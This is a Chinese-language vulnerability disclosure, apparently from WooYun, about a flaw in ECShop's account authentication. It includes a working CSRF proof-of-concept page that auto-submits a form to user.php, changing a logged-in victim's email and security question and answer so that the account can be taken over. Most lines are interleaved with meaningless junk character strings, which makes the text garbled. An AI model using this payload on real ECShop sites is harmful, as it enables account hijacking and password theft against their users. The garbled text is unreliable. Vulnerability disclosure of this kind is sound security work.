简要描述:
# H8 U, w- p, E8 ^ S1 }" iecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
# M1 Z6 q/ d; T; T4 z
5 P; |1 ]- [) y% u) n+ F/ o1 y; _# rDemo For:http://www.wooyun.org/bug.php?action=view&id=395
8 j" T, j2 \5 `1 W. \6 ^8 Z
$ @: _( H% ^* N. {/ }/ C7 j( V详细说明:
3 T. k# g$ g4 i `利用csrf和xss可以突破官方所说的“障碍”2 R0 w' s& a* S2 M+ d2 r8 h3 `
xss版本已经有人说明1 V/ a3 _/ G/ _ ~! m' k
这里给出csrf版本
6 j" K n$ E, X$ _5 _& S: B% z; a) h& `; Q, \7 U4 E* x, I
漏洞证明:8 \& B- `# g* g5 @( x j& m
<html>, }! D! U% |2 r* p" `$ e$ }
<body>; |6 z: x) x% ~; M
<form action="http://www.wooyun.org/ecshop/user.php" method="POST"> R0 X: S B6 i3 ]# g9 _- F- N7 _
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
, i6 E8 [' e. W. {3 k0 |<INPUT TYPE="text" NAME="act" value="act_edit_profile">: C0 Q0 k$ Q! `# @$ i1 l
<INPUT TYPE="text" NAME="sel_question" value="ecshop">$ M) m: r3 D- V
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">- e. h& ^% T( t1 R8 j5 D. O" g
</body>+ g5 O) S9 B( ^" `; v0 C
<script>
$ ~* D6 a" N( z% r) ^document.forms[0].submit();1 A, v- s& z, C& e/ O
</script>7 y3 U( A5 I' j P4 P! n' a- U
</html>
. ?+ j4 b. t5 U# r$ X) E构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失5 m7 }( v! q' a; s. u% e& W1 W }
5 @2 `1 F/ m# K. f1 j4 y |